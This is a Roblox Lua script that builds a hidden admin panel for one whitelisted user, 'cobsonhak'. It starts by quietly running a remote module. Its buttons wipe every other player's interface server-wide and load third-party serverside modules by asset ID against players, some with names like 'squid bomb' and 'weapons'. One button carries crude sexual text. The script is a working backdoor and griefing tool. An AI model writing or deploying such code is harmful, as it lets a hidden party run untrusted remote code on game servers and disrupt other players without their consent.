pcall(function() require(10304477576).AntiSkid() end) local Players = game:GetService("Players") local WHITELIST = { "cobsonhak", -- "Player2", -- "Player3", and more } local function isWhitelisted(player) for _, username in ipairs(WHITELIST) do if player.Name == username then return true end end return false end local function giveAdminPanel(player) if not isWhitelisted(player) then return end local ScreenGui = Instance.new("ScreenGui") ScreenGui.Name = "MrNoKrabsGUI" ScreenGui.ResetOnSpawn = false local MainFrame = Instance.new("Frame") MainFrame.Name = "MainFrame" MainFrame.Parent = ScreenGui MainFrame.BackgroundColor3 = Color3.fromRGB(11, 14, 15) MainFrame.BorderSizePixel = 0 MainFrame.Position = UDim2.new(0.5, -200, 0.5, -135) MainFrame.Size = UDim2.new(0, 400, 0, 270) MainFrame.Active = true MainFrame.Draggable = true local Header = Instance.new("Frame") Header.Name = "Header" Header.Parent = MainFrame Header.BackgroundTransparency = 1.000 Header.Size = UDim2.new(1, 0, 0, 35) local BackButton = Instance.new("TextButton") BackButton.Name = "BackButton" BackButton.Parent = Header BackButton.BackgroundTransparency = 1.000 BackButton.Position = UDim2.new(0, 8, 0, 0) BackButton.Size = UDim2.new(0, 20, 1, 0) BackButton.Font = Enum.Font.SourceSans BackButton.Text = "←" BackButton.TextColor3 = Color3.fromRGB(180, 130, 130) BackButton.TextSize = 22.000 BackButton.TextXAlignment = Enum.TextXAlignment.Left local Title = Instance.new("TextLabel") Title.Name = "Title" Title.Parent = Header Title.BackgroundTransparency = 1.000 Title.Position = UDim2.new(0, 35, 0, 0) Title.Size = UDim2.new(1, -40, 1, 0) Title.Font = Enum.Font.SourceSans Title.Text = "Mr No Krabs by cobsonhak" Title.TextColor3 = Color3.fromRGB(180, 130, 130) Title.TextSize = 19.000 Title.TextXAlignment = Enum.TextXAlignment.Left local Pages = {} local function createPageContainer(name) local container = Instance.new("ScrollingFrame") container.Name = name .. "Page" container.Parent = MainFrame container.Active = true container.BackgroundTransparency = 1.000 container.BorderSizePixel = 0 container.Position = UDim2.new(0, 12, 0, 38) container.Size = UDim2.new(1, -24, 1, -85) container.CanvasSize = UDim2.new(0, 0, 0, 320) container.ScrollBarThickness = 12 container.ScrollBarImageColor3 = Color3.fromRGB(75, 40, 40) container.Visible = false local list = Instance.new("UIListLayout") list.Parent = container list.SortOrder = Enum.SortOrder.LayoutOrder list.Padding = UDim.new(0, 5) Pages[name] = container return container end local Menu1 = createPageContainer("Start") local Menu2 = createPageContainer("Scripts") local Menu3 = createPageContainer("Toys") local activeHistory = {} local function setView(pageName, titleOverride) for name, frame in pairs(Pages) do frame.Visible = (name == pageName) end Title.Text = titleOverride or ("Mr No Krabs by cobsonhak - " .. pageName) if #activeHistory == 0 or activeHistory[#activeHistory] ~= pageName then table.insert(activeHistory, pageName) end end BackButton.MouseButton1Click:Connect(function() if #activeHistory > 1 then table.remove(activeHistory) local targetPage = activeHistory[#activeHistory] setView(targetPage, targetPage == "Start" and "Mr No Krabs by cobsonhak" or nil) end end) local function addRowButton(parentFrame, text, callback) local btn = Instance.new("TextButton") btn.Parent = parentFrame btn.BackgroundColor3 = Color3.fromRGB(140, 20, 20) btn.BorderSizePixel = 0 btn.Size = UDim2.new(1, -2, 0, 20) btn.Font = Enum.Font.SourceSans btn.Text = " " .. text btn.TextColor3 = Color3.fromRGB(240, 220, 220) btn.TextSize = 14.000 btn.TextXAlignment = Enum.TextXAlignment.Left btn.MouseButton1Click:Connect(function() pcall(callback) end) return btn end addRowButton(Menu1, "Anti GUI (Wipe All Player UIs)", function() for _, targetPlayer in ipairs(Players:GetPlayers()) do local targetGui = targetPlayer:FindFirstChildOfClass("PlayerGui") if targetGui then for _, uiElement in ipairs(targetGui:GetChildren()) do if uiElement.Name ~= "MrNoKrabsGUI" then uiElement:Destroy() end end end end print("Server wide UI wipe executed by: " .. player.Name) end) addRowButton(Menu1, "Scripts", function() setView("Scripts") end) addRowButton(Menu1, "Toys", function() setView("Toys") end) addRowButton(Menu1, "chicks with big dicks", function() print("chicks with big dicks" .. player.Name) end) addRowButton(Menu2, "Sponge Map", function() require(3164497408).spongebob() end) addRowButton(Menu2, "Drill", function() require(11505758587).RAroblox(player.Name) end) addRowButton(Menu2, "Timed", function() require(4867426485):SD(player.Name) end) addRowButton(Menu2, "Minecraft", function() require(16756009191).mc(player.Name) end) addRowButton(Menu2, "Obunga", function() require(97971729290214)(player.Name) end) addRowButton(Menu2, "Dexs", function() require(14572394952)(player.Name) end) addRowButton(Menu2, "Musketeer", function() require(6583606008).load(player.Name) end) addRowButton(Menu2, "neko", function() require(134825709410639).Burenyuu(player.Name) end) addRowButton(Menu2, "Armed Helicopter", function() require(12620186035).Huey(player.Name) end) addRowButton(Menu2, "squid bomb", function() require(11838049109).squidBomb("") end) addRowButton(Menu3, "weapons", function() require(95954934655731).weapons(player.Name) end) addRowButton(Menu3, "Wormhole Device", function() require(15877665199).give(player.Name) end) local BottomRow = Instance.new("Frame") BottomRow.Name = "BottomRow" BottomRow.Parent = MainFrame BottomRow.BackgroundTransparency = 1.000 BottomRow.Position = UDim2.new(0, 12, 1, -40) BottomRow.Size = UDim2.new(1, -24, 0, 30) local function addFooterButton(text, width, xPos, callback) local btn = Instance.new("TextButton") btn.Parent = BottomRow btn.BackgroundColor3 = Color3.fromRGB(140, 20, 20) -- Dark Red Accent btn.BorderSizePixel = 0 btn.Position = xPos btn.Size = UDim2.new(0, width, 1, 0) btn.Font = Enum.Font.SourceSans btn.Text = text btn.TextColor3 = Color3.fromRGB(240, 220, 220) btn.TextSize = 14.000 btn.MouseButton1Click:Connect(function() pcall(callback) end) return btn end addFooterButton("Home", 40, UDim2.new(0, 0, 0, 0), function() setView("Start", "Mr No Krabs by cobsonhak") end) addFooterButton("Scripts", 45, UDim2.new(0, 45, 0, 0), function() setView("Scripts") end) addFooterButton("no Toys", 185, UDim2.new(0, 95, 0, 0), function() setView("Toys") end) setView("Start", "Mr No Krabs by cobsonhak") local playerGui = player:WaitForChild("PlayerGui", 10) if playerGui then ScreenGui.Parent = playerGui end end Players.PlayerAdded:Connect(giveAdminPanel) for _, player in ipairs(Players:GetPlayers()) do task.spawn(giveAdminPanel, player) end